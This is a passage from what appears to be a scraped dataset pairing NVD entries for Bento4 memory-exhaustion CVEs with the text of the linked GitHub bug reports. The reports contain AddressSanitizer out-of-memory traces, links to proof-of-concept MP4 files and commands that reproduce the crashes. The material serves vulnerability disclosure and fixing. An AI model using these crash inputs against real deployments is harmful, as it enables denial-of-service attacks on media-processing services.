in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #26 0x5240d7 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #27 0x5231a3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #28 0x5231a3 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #29 0x50dcd2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #30 0x50bab9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #31 0x541dd9 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84:16 #32 0x5416e8 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50:16 #33 0x50e924 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:580:20 #34 0x50bab9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #35 0x523ea7 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 ==6930==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/Bento4/install-asan/bin/mp4audioclip+0x4c560d) in operator new(unsigned long) ==6930==ABORTING test_2: ================================================================= ==56759==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xc5d400b8 bytes #0 0x4c571d in operator new[](unsigned long) (/Bento4/install-asan/bin/mp4audioclip+0x4c571d) #1 0x53dd69 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210:28 #2 0x53dd69 in AP4_DataBuffer::SetDataSize(unsigned int) /Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151:33 ==56759==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/Bento4/install-asan/bin/mp4audioclip+0x4c571d) in operator new[](unsigned long) ==56759==ABORTING ``` For **mp4dump** with [test input](https://github.com/WorldExecute/files/blob/main/Bento4/mp4dump/out-of-memory/test_1): ``` ================================================================= ==108091==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xf500000a0 bytes #0 0x4c562d in operator new(unsigned long) (/Bento4/install-asan/bin/mp4dump+0x4c562d) #1 0x5c35f8 in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /Bento4/Source/C++/Core/Ap4Array.h:172:25 #2 0x5c35f8 in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /Bento4/Source/C++/Core/Ap4Array.h:210:25 #3 0x5c35f8 in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4TrunAtom.cpp:127:15 #4 0x5c29c9 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16 #5 0x4e5252 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20 #6 0x4e24b9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #7 0x4f8667 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #8 0x4f7733 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #9 0x4f7733 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #10 0x4e46d2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #11 0x4e24b9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #12 0x4f8667 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #13 0x4f7733 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #14 0x4f7733 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #15 0x4e46d2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #16 0x4e24b9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #17 0x516429 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84:16 #18 0x515d38 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50:16 #19 0x4e5324 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:580:20 #20 0x4e24b9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #21 0x4f8437 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #22 0x4f7733 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #23 0x4f7733 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #24 0x4e46d2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #25 0x4e24b9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #26 0x4f8667 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #27 0x4f7733 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #28 0x4f7733 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #29 0x4e46d2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #30 0x4e24b9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #31 0x4f8667 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #32 0x4f7733 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #33 0x4f7733 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #34 0x4e46d2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #35 0x4e24b9 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #36 0x516429 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84:16 ==108091==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/Bento4/install-asan/bin/mp4dump+0x4c562d) in operator new(unsigned long) ==108091==ABORTING ``` You can use the following setp to reproduce all the problems. ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check && cd check cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j git clone https://github.com/WorldExecute/files.git ./mp4audioclip ./files/Bento4/mp4audioclip/out-of-memory/test_1 /dev/null ./mp4dump ./files/Bento4/mp4dump/out-of-memory/test_1 ``` Thanks for your time!
out-of-memory
https://api.github.com/repos/axiomatic-systems/Bento4/issues/747/comments
0
2022-08-28T07:58:44Z
2023-05-29T02:53:16Z
https://github.com/axiomatic-systems/Bento4/issues/747
1,353,278,230
747
CVE-2022-41845
2022-09-30T05:15:11.787
An issue was discovered in Bento4 1.6.0-639. There ie excessive memory consumption in the function AP4_Array<AP4_ElstEntry>::EnsureCapacity in Core/Ap4Array.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/747" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/770" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/770
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hello, I use my fuzzer to fuzz binary mp4tag , the three binary all crashede, and shows that allocator is out of memory trying to allocate 0xxxxxxx bytes. Then I use the crash input to test binary mpesplit and mp42hevc,and all crashed beacuse of same situation. The version of Bento4 is the latest commit[5b7cc25](https://github.com/axiomatic-systems/Bento4/commit/5b7cc2500d514717a64675fcf631939494c074ce) and the operation system is Ubuntu 18.04(docker). The following is the details.And the issue is different from #342. Beacuse I test the poc,and it didn't work. # Bug1 ``` root@76fc65f1cc2f:/Bento4/build# ./mp4tag crash_1.mp4 ================================================================= ==206601==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xfffeffee bytes #0 0x4f4778 in operator new[](unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:102 #1 0x532595 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210:28 #2 0x532595 in AP4_DataBuffer::SetDataSize(unsigned int) /Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151:33 ==206601==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:102 in operator new[](unsigned long) ==206601==ABORTING ``` # Bug2 ``` root@76fc65f1cc2f:/Bento4/build# ./mp4tag crash_2.mp4 ================================================================= ==233834==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x1fffffff8 bytes #0 0x4f4618 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x537e3d in AP4_Array<AP4_ElstEntry>::EnsureCapacity(unsigned int) /Bento4/Source/C++/Core/Ap4Array.h:172:25 #2 0x537e3d in AP4_ElstAtom::AP4_ElstAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4ElstAtom.cpp:87:15 #3 0x537b15 in AP4_ElstAtom::Create(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4ElstAtom.cpp:51:16 #4 0x50e244 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:590:20 #5 0x50cfd4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #6 0x50c7fe in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #7 0x53a50e in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:104:12 #8 0x53a9ed in AP4_File::AP4_File(AP4_ByteStream&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:78:5 #9 0x4f9403 in main /Bento4/Source/C++/Apps/Mp4Tag/Mp4Tag.cpp:821:20 #10 0x7f0a40dd5c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 ==233834==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 in operator new(unsigned long) ==233834==ABORTING ``` # Environment clang 11.0.1 clang++ 11.0.1 version:master branch(commit[5b7cc25](https://github.com/axiomatic-systems/Bento4/commit/5b7cc2500d514717a64675fcf631939494c074ce)) # Platform ``` $ uname -a Linux kali 5.10.0-kali9-amd64 #1 SMP Debian 5.10.46-4kali1 (2021-08-09) x86_64 GNU/Linux ``` # How to compile ``` export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -g" export CXXFLAGS="-fsanitize=address -g" mkdir cmakebuild cd cmakebuild cmake -DCMAKE_BUILD_TYPE=Release .. make ``` # POC [crash.zip](https://github.com/axiomatic-systems/Bento4/files/9631277/crash.zip) # NOTE I find the two bugs not only exist in latest branch but also exist in latest release version Bento4-1.6.0-639. # Credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Yin li,Jiayuan Zhang([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Thansk for your time!
there are some vulnerabilities in binary mp4tag
https://api.github.com/repos/axiomatic-systems/Bento4/issues/770/comments
0
2022-09-23T07:02:26Z
2023-06-26T06:33:03Z
https://github.com/axiomatic-systems/Bento4/issues/770
1,383,377,290
770
CVE-2022-41846
2022-09-30T05:15:11.870
An issue was discovered in Bento4 1.6.0-639. There ie excessive memory consumption in the function AP4_DataBuffer::ReallocateBuffer in Core/Ap4DataBuffer.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/342" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/770" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/342
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A crafted input will lead to Memory allocation failed in Ap4DataBuffer.cpp at Bento4 1.5.1-627 Triggered by ./mp42hls crash2.mp4 Poc [crash2.zip](https://github.com/axiomatic-systems/Bento4/files/2685099/crash2.zip) Bento4 Version 1.5.1-627 The ASAN information is as follows: ``` ==92387==ERROR: AddressSanitizer failed to allocate 0x80003000 (2147495936) bytes of LargeMmapAllocator (errno: 12) ==92387==Process memory map follows: 0x000000400000-0x0000005aa000 /home/jas/Downloads/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls 0x0000007a9000-0x0000007aa000 /home/jas/Downloads/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls 0x0000007aa000-0x0000007b9000 /home/jas/Downloads/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls 0x0000007b9000-0x0000007ba000 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x600000000000-0x602000000000 0x602000000000-0x602000010000 0x602000010000-0x603000000000 0x603000000000-0x603000010000 0x603000010000-0x604000000000 0x604000000000-0x604000010000 0x604000010000-0x606000000000 0x606000000000-0x606000010000 0x606000010000-0x607000000000 0x607000000000-0x607000010000 0x607000010000-0x608000000000 0x608000000000-0x608000010000 0x608000010000-0x60b000000000 0x60b000000000-0x60b000010000 0x60b000010000-0x60c000000000 0x60c000000000-0x60c000010000 0x60c000010000-0x60d000000000 0x60d000000000-0x60d000010000 0x60d000010000-0x60e000000000 0x60e000000000-0x60e000010000 0x60e000010000-0x610000000000 0x610000000000-0x610000010000 0x610000010000-0x611000000000 0x611000000000-0x611000010000 0x611000010000-0x613000000000 0x613000000000-0x613000010000 0x613000010000-0x614000000000 0x614000000000-0x614000020000 0x614000020000-0x615000000000 0x615000000000-0x615000020000 0x615000020000-0x616000000000 0x616000000000-0x616000020000 0x616000020000-0x619000000000 0x619000000000-0x619000020000 0x619000020000-0x61c000000000 0x61c000000000-0x61c000020000 0x61c000020000-0x621000000000 0x621000000000-0x621000020000 0x621000020000-0x624000000000 0x624000000000-0x624000020000 0x624000020000-0x626000000000 0x626000000000-0x626000020000 0x626000020000-0x629000000000 0x629000000000-0x629000010000 0x629000010000-0x62d000000000 0x62d000000000-0x62d000020000 0x62d000020000-0x631000000000 0x631000000000-0x631000030000 0x631000030000-0x640000000000 0x640000000000-0x640000003000 0x7fe341500000-0x7fe341600000 0x7fe341700000-0x7fe341800000 0x7fe3418fe000-0x7fe343c50000 0x7fe343c50000-0x7fe343d58000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7fe343d58000-0x7fe343f57000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7fe343f57000-0x7fe343f58000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7fe343f58000-0x7fe343f59000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7fe343f59000-0x7fe343f5c000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7fe343f5c000-0x7fe34415b000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7fe34415b000-0x7fe34415c000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7fe34415c000-0x7fe34415d000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7fe34415d000-0x7fe344175000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7fe344175000-0x7fe344374000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7fe344374000-0x7fe344375000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7fe344375000-0x7fe344376000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7fe344376000-0x7fe34437a000 0x7fe34437a000-0x7fe34453a000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7fe34453a000-0x7fe34473a000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7fe34473a000-0x7fe34473e000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7fe34473e000-0x7fe344740000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7fe344740000-0x7fe344744000 0x7fe344744000-0x7fe34475a000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fe34475a000-0x7fe344959000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fe344959000-0x7fe34495a000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fe34495a000-0x7fe344acc000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7fe344acc000-0x7fe344ccc000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7fe344ccc000-0x7fe344cd6000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7fe344cd6000-0x7fe344cd8000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7fe344cd8000-0x7fe344cdc000 0x7fe344cdc000-0x7fe344dd0000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7fe344dd0000-0x7fe344fd0000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7fe344fd0000-0x7fe344fd3000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7fe344fd3000-0x7fe344fd4000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7fe344fd4000-0x7fe345c49000 0x7fe345c49000-0x7fe345c6f000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7fe345d54000-0x7fe345e58000 0x7fe345e58000-0x7fe345e6e000 0x7fe345e6e000-0x7fe345e6f000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7fe345e6f000-0x7fe345e70000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7fe345e70000-0x7fe345e71000 0x7fffeaa6e000-0x7fffeaa8f000 [stack] 0x7fffeaae9000-0x7fffeaaeb000 [vvar] 0x7fffeaaeb000-0x7fffeaaed000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==92387==End of process memory map. ==92387==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_posix.cc:121 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0) #0 0x7fe344d7c631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631) #1 0x7fe344d815e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3) #2 0x7fe344d89611 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xad611) #3 0x7fe344cfec0c (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22c0c) #4 0x7fe344d7567e in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9967e) #5 0x4abb54 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/jas/Downloads/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4DataBuffer.cpp:210 #6 0x4abb54 in AP4_DataBuffer::SetDataSize(unsigned int) /home/jas/Downloads/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4DataBuffer.cpp:151 #7 0x48ba72 in AP4_Sample::ReadData(AP4_DataBuffer&, unsigned int, unsigned int) /home/jas/Downloads/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4Sample.cpp:147 #8 0x48ba72 in AP4_Sample::ReadData(AP4_DataBuffer&) /home/jas/Downloads/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4Sample.cpp:127 #9 0x4449dd in ReadSample /home/jas/Downloads/Bento4-SRC-1-5-1-627/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:976 #10 0x4485af in WriteSamples /home/jas/Downloads/Bento4-SRC-1-5-1-627/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1251 #11 0x4412a0 in main /home/jas/Downloads/Bento4-SRC-1-5-1-627/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:2088 #12 0x7fe34439a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #13 0x4445b8 in _start (/home/jas/Downloads/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls+0x4445b8) ``` FoundBy: yjiiit@aliyun.com
Allocate for large amounts of memory failed in Ap4DataBuffer.cpp:210 at Bento4 1.5.1-627 when running mp42hls
https://api.github.com/repos/axiomatic-systems/Bento4/issues/342/comments
1
2018-12-17T08:48:55Z
2019-01-12T20:15:42Z
https://github.com/axiomatic-systems/Bento4/issues/342
391,610,142
342
CVE-2022-41847
2022-09-30T05:15:11.957
An issue was discovered in Bento4 1.6.0-639. A memory leak exists in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) in System/StdC/Ap4StdCFileByteStream.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/750" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/759" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/775" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/759
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
